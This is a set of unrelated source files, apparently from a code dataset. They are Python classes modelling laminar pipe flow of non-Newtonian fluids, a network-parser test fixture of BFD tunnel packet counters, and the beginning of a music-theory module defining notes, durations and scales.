return -spi.quad(lambda x: self.shear_rate(x,dp),self.__radius,rad)[0]
def stress_wall(self):
"""
Computes shear stress at wall, radial position radius.
"""
if self.__pressure_drop:
return self.__radius/2.*self.__pressure_drop/self.__length
else:
return None
def _shear_rate_wall(self):
"""
Computes the true wall shear rate, or shear rate at radial position radius.
"""
rad = self.__radius
if self.__pressure_drop:
dp = self.__pressure_drop
return self.shear_rate(rad,dp)
else:
return None
def shear_rate_plot(self):
"""
Creates plot of shear rate versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.shear_rate(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Shear rate')
return [x,y]
def viscosity_wall(self):
"""
Computes viscosity at wall, radial position radius.
"""
return self._viscosity.calc_visc(self._shear_rate_wall())
def re_wall(self):
"""
Computes Reynolds number at the wall.
"""
return self.__density*self.__radius*2.*self.__q/(3.14159*self.__radius**2)/self.viscosity_wall()
def vz_plot(self):
"""
Creates plot of axial velocity versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.vz(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Velocity')
def __q_integrand(self,rad,dp):
return 2.*3.141592653589*rad*self.vz(rad,dp)
def __q_calc(self,dp):
"""
Computes volumetric flow rate for preessure drop argument of dp_want.
The object attribute self.pressure_drop is set to dp_want.
"""
#return spi.quad(self.__q_integrand(),0.,self.__radius)[0]
return spi.quad( lambda x: self.__q_integrand(x,dp),0.,self.__radius)[0]
def __q_eqn(self,dp_v):
return self.__q_calc(dp_v) - self.__q
def __dp_calc(self):
"""
Computes the pressure drop for a volumetric flow rate of q_want.
The computation is iterative due to nature of many viscosity functiions.
The object attribute self.pressure_drop is set to result.
"""
self.__pressure_drop= spo.brentq(self.__q_eqn,self.scale_min,self.scale_max)
return
def q_plot(self,pressure_drop_min,pressure_drop_max):
"""
Creates log-log plot of pressure drop versus flow rate.
A log-spacing of pressure drops between args pressure_drop_min and pressure_drop_max
are created.
"""
x = np.logspace(np.log10(pressure_drop_min),np.log10(pressure_drop_max),51)
y = [self.__q_calc(dp) for dp in x]
plt.loglog(y,x,'-')
plt.xlabel('Flow rate')
plt.ylabel('Pressure drop')
plt.title(self.name)
@property
def pressure_drop(self):
return self.__pressure_drop
@pressure_drop.setter
def pressure_drop(self,pressure_drop):
if pressure_drop:
self.__pressure_drop = pressure_drop
self.__q = self.__q_calc(pressure_drop)
else:
self.__pressure_drop = None
@property
def q(self):
return self.__q
@q.setter
def q(self,q):
if q:
self.__q = q
# Estimate dp_a to set scale to reasonalble value
dp_a = 8.*self._viscosity.calc_visc(4.*self.__q/(3.14158*self.__radius**3))* \
self.__length*self.__q/(3.14159*self.__radius**4)
self.scale_max=2.*dp_a
self.scale_min=dp_a/100.
self.__dp_calc()
else:
self.__q = None
@property
def density(self):
return self.__density
@property
def shear_rate_wall(self):
return self._shear_rate_wall()
@property
def shear_stress_wall(self):
return self.stress_wall()
@property
def radius(self):
return self.__radius
@radius.setter
def radius(self,radius):
self.__radius = radius
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
@property
def length(self):
return self.__length
@length.setter
def length(self,length):
self.__length = length
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
#@property
#def viscosity(self):
# return self._viscosity
#@viscosity.setter
#def viscosity(self,viscosity):
# self._viscosity = viscosity
# if self.pressure_drop:
# self.__q = self.__q_calc(self.pressure_drop)
# else:
# self.__pressure_drop = None
#-------------------------------------------------------------------------------------
# Analytical solution for HB
#-------------------------------------------------------------------------------------
class laminar_HB_analytical:
"""
This class contains analytical solution for pipe flow of Herschel-Bulkley fluids
"""
def __init__(self,name='Default',density=1000.,radius=.01,length=1.,viscosity=viscosity.herschel_bulkley(name='default',tauy=1.,k=1.,n=1.), \
scale=1.e+6,pressure_drop = None, q = None):
self.name=name
self.__density = density
self.__radius=radius
self.__length=length
self._viscosity = viscosity
self.__r = 0.
self.scale=scale
if pressure_drop:
self.pressure_drop = pressure_drop
else:
self.pressure_drop = None
if q:
self.q = q
self.__q = q
else:
self.__q = None
def __str__(self):
return str('Name ='+self.name+'\n'+
'Radius ='+str(self.__radius)+'\n'+
'Length ='+str(self.__length)+'\n'+
'Pressure drop ='+str(self.__pressure_drop)+'\n'+
'Flow rate ='+str(self.__q)+'\n'+
'Shear rate wall = '+str(self._shear_rate_wall()))
def shear_rate(self,rad,dp):
dp_dx=dp/self.__length
r_y=2*self._viscosity.tauy/dp_dx # radius of unyielded core
n=self._viscosity.n
k=self._viscosity.k
Vc = (1/(2*k)*dp_dx)**(1/n)*(n/(n+1))*(self.__radius-r_y)**((n+1)/n)
if rad<=r_y:
gammadot=0
else:
gammadot=Vc*(n+1)/n/(self.__radius-r_y)*((rad-r_y)/(self.__radius-r_y))**(1/n)
return gammadot
def vz(self,rad,dp):
"""
This method computes the axial velocity vz at a radial position, rad.
"""
dp_dx=dp/self.__length
r_y=2*self._viscosity.tauy/dp_dx
n=self._viscosity.n
k=self._viscosity.k
Vc = (1/(2*k)*dp_dx)**(1/n)*(n/(n+1))*(self.__radius-r_y)**((n+1)/n)
if rad<=r_y:
V=Vc
else:
V=Vc*(1-((rad-r_y)/(self.__radius-r_y))**((n+1)/n))
return V
def stress_wall(self):
"""
Computes shear stress at wall, radial position radius.
"""
if self.__pressure_drop:
return self.__radius/2.*self.__pressure_drop/self.__length
else:
return None
def _shear_rate_wall(self):
"""
Computes the true wall shear rate, or shear rate at radial position radius.
"""
rad = self.__radius
if self.__pressure_drop:
dp = self.__pressure_drop
return self.shear_rate(rad,dp)
else:
return None
def shear_rate_plot(self):
"""
Creates plot of shear rate versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.shear_rate(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Shear rate')
def viscosity_wall(self):
"""
Computes viscosity at wall, radial position radius.
"""
return self._viscosity.calc_visc(self._shear_rate_wall())
def re_wall(self):
"""
Computes Reynolds number at the wall.
"""
return self.__density*self.__radius*2.*self.__q/(3.14159*self.__radius**2)/self.viscosity_wall()
def vz_plot(self):
"""
Creates plot of axial velocity versus radial position.
"""
dp = self.__pressure_drop
x = np.linspace(0.,self.__radius,51)
y = [self.vz(rad,dp) for rad in x]
plt.plot(x,y)
plt.xlabel('Radial position')
plt.ylabel('Velocity')
def __q_calc(self,dp):
R=self.__radius
dp_dx=dp/self.__length
r_y=2*self._viscosity.tauy/dp_dx
n=self._viscosity.n
k=self._viscosity.k
return np.pi*n/(3*n+1)*(dp_dx/2/k)**(1/n)*R**(1/n+3)*(1-r_y/R)**((n+1)/n)*(1+2*n/(2*n+1)*r_y/R*(1+n/(n+1)*r_y/R))
def __q_eqn(self,dp_v):
return self.__q_calc(dp_v) - self.__q
def __dp_calc(self):
"""
Computes the pressure drop for a volumetric flow rate of q_want.
The computation is iterative due to nature of many viscosity functiions.
The object attribute self.pressure_drop is set to result.
"""
self.__pressure_drop= spo.brentq(self.__q_eqn,self.scale_min,self.scale_max)
return
def q_plot(self,pressure_drop_min,pressure_drop_max):
"""
Creates log-log plot of pressure drop versus flow rate.
A log-spacing of pressure drops between args pressure_drop_min and pressure_drop_max
are created.
"""
x = np.logspace(np.log10(pressure_drop_min),np.log10(pressure_drop_max),51)
y = [self.__q_calc(dp) for dp in x]
plt.loglog(y,x,'-')
plt.xlabel('Flow rate')
plt.ylabel('Pressure drop')
plt.title(self.name)
@property
def pressure_drop(self):
return self.__pressure_drop
@pressure_drop.setter
def pressure_drop(self,pressure_drop):
if pressure_drop:
self.__pressure_drop = pressure_drop
self.__q = self.__q_calc(pressure_drop)
else:
self.__pressure_drop = None
@property
def q(self):
return self.__q
@q.setter
def q(self,q):
if q:
self.__q = q
# Estimate dp_a to set scale to reasonalble value
dp_a = 8.*self._viscosity.calc_visc(4.*self.__q/(3.14158*self.__radius**3))* \
self.__length*self.__q/(3.14159*self.__radius**4)
self.scale_max=2.*dp_a
self.scale_min=dp_a/100.
self.__dp_calc()
else:
self.__q = None
@property
def density(self):
return self.__density
@property
def shear_rate_wall(self):
return self._shear_rate_wall()
@property
def shear_stress_wall(self):
return self.stress_wall()
@property
def radius(self):
return self.__radius
@radius.setter
def radius(self,radius):
self.__radius = radius
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
@property
def length(self):
return self.__length
@length.setter
def length(self,length):
self.__length = length
if self.__pressure_drop:
self.__q = self.__q_calc(self.__pressure_drop)
else:
self.__pressure_drop = None
| 31.702461 | 145 | 0.576388 | 1,860 | 14,171 | 4.089247 | 0.091398 | 0.132527 | 0.100973 | 0.023666 | 0.834999 | 0.824086 | 0.821325 | 0.805943 | 0.805943 | 0.800552 | 0 | 0.016571 | 0.301602 | 14,171 | 446 | 146 | 31.773543 | 0.751945 | 0.20175 | 0 | 0.903448 | 0 | 0 | 0.030032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.17931 | false | 0 | 0.02069 | 0.068966 | 0.348276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31c3276c55e1641917dd81cc8f6a8d531e33ad17 | 27,072 | py | Python | src/genie/libs/parser/iosxe/tests/ShowSdwanTunnelStatistics/cli/equal/bfd_stats_golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowSdwanTunnelStatistics/cli/equal/bfd_stats_golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowSdwanTunnelStatistics/cli/equal/bfd_stats_golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | expected_output = {
"tunnel": {
"150.0.5.1": {
"remote": {
"150.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299689,
"bfd_echo_rx_pkts": 299687,
"bfd_echo_tx_octets": 30717979,
"bfd_echo_rx_octets": 34913686
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2509,
"bfd_pmtu_rx_pkts": 2509,
"bfd_pmtu_tx_octets": 1823850,
"bfd_pmtu_rx_octets": 1860352
}
}
},
"150.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299682,
"bfd_echo_rx_pkts": 299637,
"bfd_echo_tx_octets": 30717139,
"bfd_echo_rx_octets": 34908134
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294495,
"bfd_echo_rx_pkts": 294454,
"bfd_echo_tx_octets": 30203871,
"bfd_echo_rx_octets": 34285901
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294125,
"bfd_echo_rx_pkts": 293733,
"bfd_echo_tx_octets": 30167101,
"bfd_echo_rx_octets": 34201978
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294305,
"bfd_echo_rx_pkts": 294005,
"bfd_echo_tx_octets": 30184935,
"bfd_echo_rx_octets": 34233960
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.8.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299449,
"bfd_echo_rx_pkts": 299114,
"bfd_echo_tx_octets": 30694415,
"bfd_echo_rx_octets": 34847061
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876636
}
}
},
"150.0.10.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299747,
"bfd_echo_rx_pkts": 299744,
"bfd_echo_tx_octets": 30723735,
"bfd_echo_rx_octets": 34920519
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294181,
"bfd_echo_rx_pkts": 293700,
"bfd_echo_tx_octets": 30172960,
"bfd_echo_rx_octets": 34198326
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876658
}
}
},
"151.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299753,
"bfd_echo_rx_pkts": 299740,
"bfd_echo_tx_octets": 30724497,
"bfd_echo_rx_octets": 34919941
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2509,
"bfd_pmtu_rx_pkts": 2509,
"bfd_pmtu_tx_octets": 1823850,
"bfd_pmtu_rx_octets": 1860301
}
}
},
"151.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299738,
"bfd_echo_rx_pkts": 299732,
"bfd_echo_tx_octets": 30722858,
"bfd_echo_rx_octets": 34919086
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294489,
"bfd_echo_rx_pkts": 294446,
"bfd_echo_tx_octets": 30203228,
"bfd_echo_rx_octets": 34285004
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294158,
"bfd_echo_rx_pkts": 293764,
"bfd_echo_tx_octets": 30170564,
"bfd_echo_rx_octets": 34205516
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"151.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294322,
"bfd_echo_rx_pkts": 294012,
"bfd_echo_tx_octets": 30186562,
"bfd_echo_rx_octets": 34234926
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876662
}
}
},
"151.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294102,
"bfd_echo_rx_pkts": 293625,
"bfd_echo_tx_octets": 30164579,
"bfd_echo_rx_octets": 34189858
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
}
}
},
"151.0.5.1": {
"remote": {
"150.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299708,
"bfd_echo_rx_pkts": 299707,
"bfd_echo_tx_octets": 30719580,
"bfd_echo_rx_octets": 34916359
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299703,
"bfd_echo_rx_pkts": 299698,
"bfd_echo_tx_octets": 30719358,
"bfd_echo_rx_octets": 34915034
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"150.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294490,
"bfd_echo_rx_pkts": 294438,
"bfd_echo_tx_octets": 30203320,
"bfd_echo_rx_octets": 34284114
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294180,
"bfd_echo_rx_pkts": 293787,
"bfd_echo_tx_octets": 30172840,
"bfd_echo_rx_octets": 34208171
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294312,
"bfd_echo_rx_pkts": 294016,
"bfd_echo_tx_octets": 30185621,
"bfd_echo_rx_octets": 34235259
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.8.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299427,
"bfd_echo_rx_pkts": 299084,
"bfd_echo_tx_octets": 30692146,
"bfd_echo_rx_octets": 34843608
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"150.0.10.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299743,
"bfd_echo_rx_pkts": 299742,
"bfd_echo_tx_octets": 30723451,
"bfd_echo_rx_octets": 34920153
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"150.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294151,
"bfd_echo_rx_pkts": 293675,
"bfd_echo_tx_octets": 30169493,
"bfd_echo_rx_octets": 34195788
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2531,
"bfd_pmtu_rx_pkts": 2531,
"bfd_pmtu_tx_octets": 1839848,
"bfd_pmtu_rx_octets": 1876658
}
}
},
"151.0.0.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299699,
"bfd_echo_rx_pkts": 299699,
"bfd_echo_tx_octets": 30718843,
"bfd_echo_rx_octets": 34915238
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.1.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.2.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 299748,
"bfd_echo_rx_pkts": 299727,
"bfd_echo_tx_octets": 30723946,
"bfd_echo_rx_octets": 34918493
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.3.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 0,
"bfd_echo_rx_pkts": 0,
"bfd_echo_tx_octets": 0,
"bfd_echo_rx_octets": 0
},
"pmtu": {
"bfd_pmtu_tx_pkts": 0,
"bfd_pmtu_rx_pkts": 0,
"bfd_pmtu_tx_octets": 0,
"bfd_pmtu_rx_octets": 0
}
}
},
"151.0.4.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294490,
"bfd_echo_rx_pkts": 294444,
"bfd_echo_tx_octets": 30203166,
"bfd_echo_rx_octets": 34284946
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2508,
"bfd_pmtu_rx_pkts": 2508,
"bfd_pmtu_tx_octets": 1823772,
"bfd_pmtu_rx_octets": 1858884
}
}
},
"151.0.6.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294131,
"bfd_echo_rx_pkts": 293740,
"bfd_echo_tx_octets": 30167674,
"bfd_echo_rx_octets": 34202832
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"151.0.7.1": {
"src_port": 12346,
"dst_port": 12346,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294313,
"bfd_echo_rx_pkts": 294009,
"bfd_echo_tx_octets": 30185860,
"bfd_echo_rx_octets": 34234335
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
},
"151.0.40.4": {
"src_port": 12346,
"dst_port": 12366,
"bfd": {
"echo": {
"bfd_echo_tx_pkts": 294178,
"bfd_echo_rx_pkts": 293702,
"bfd_echo_tx_octets": 30172530,
"bfd_echo_rx_octets": 34198664
},
"pmtu": {
"bfd_pmtu_tx_pkts": 2530,
"bfd_pmtu_rx_pkts": 2530,
"bfd_pmtu_tx_octets": 1839770,
"bfd_pmtu_rx_octets": 1875190
}
}
}
}
}
}
}
| 40.956127 | 59 | 0.293994 | 1,921 | 27,072 | 3.655388 | 0.080167 | 0.179436 | 0.092281 | 0.076901 | 0.715038 | 0.715038 | 0.715038 | 0.715038 | 0.715038 | 0.715038 | 0 | 0.200585 | 0.621011 | 27,072 | 660 | 60 | 41.018182 | 0.483821 | 0 | 0 | 0.593939 | 0 | 0 | 0.230275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
31d6662e308bf4de5302074ee88b2511e5329bed | 211,848 | py | Python | src/Skeleton/MusicTheory.py | Voice-First-AI/generative-music-watson | e666f64602baab2e35a66c0a5c4389b1bd5666c9 | [
"Apache-2.0"
] | null | null | null | src/Skeleton/MusicTheory.py | Voice-First-AI/generative-music-watson | e666f64602baab2e35a66c0a5c4389b1bd5666c9 | [
"Apache-2.0"
] | null | null | null | src/Skeleton/MusicTheory.py | Voice-First-AI/generative-music-watson | e666f64602baab2e35a66c0a5c4389b1bd5666c9 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
# Chromatic note names in ascending pitch order; the "s" suffix marks a sharp.
Notes = [ "C", "Cs", "D", "Ds", "E", "F", "Fs", "G", "Gs", "A", "As", "B" ] ;
# Note durations expressed as fractions of a whole note.
HalfNote = 0.5
ThirtySecondNote = 0.03125
QuarterNote = 0.25
EighthNote = 0.125
SixteenthNote = 0.0625
# Durations for a note plus a trailing rest.
# NOTE(review): only HalfNoteAndRest (1.0) is double its plain duration; the
# other *AndRest values equal their plain counterparts -- confirm intended.
HalfNoteAndRest = 1.0
QuarterNoteAndRest = 0.25
EighthNoteAndRest = 0.125
SixteenthNoteAndRest = 0.0625
ThirtySecondNoteAndRest = 0.03125
# [low, high] octave ranges for each voice.
BassOctaveRange = [ 4, 4]
MelodyOctaveRange = [5, 5 ]
DefaultOctaveRange = [4, 5 ]
# Note lengths in ticks (presumably MIDI ticks at 480 per quarter note,
# since an eighth note is 240 -- TODO confirm against the sequencer code).
EightNoteInTicks = 240
SixteenthNoteInTicks = 120
# Note name -> pitch class (0-11), in chromatic order starting at C.
NotesToPitch = {
    name: pitch
    for pitch, name in enumerate("C Cs D Ds E F Fs G Gs A As B".split())
}
# Pitch class (0-11) -> note name; the inverse mapping of NotesToPitch.
pitchToNotes = dict(enumerate("C Cs D Ds E F Fs G Gs A As B".split()))
# Five-note (pentatonic) subset of each named scale, listed from the root.
# Includes the octatonic ('Oct'), 'CArabic' and harmonic-minor ('CHMinor')
# variants alongside the 12 major and 12 minor keys.
PentatonicScale = {
'GsMajor': ['Gs', 'As', 'C', 'Ds', 'F' ],
'CMajor': ['C', 'D', 'E', 'G', 'A' ],
'DOct': ['D', 'Ds', 'F', 'Gs', 'A' ],
'BMinor': ['B', 'D', 'E', 'Fs', 'A' ],
'CArabic': ['C', 'Cs', 'E', 'G', 'Gs' ],
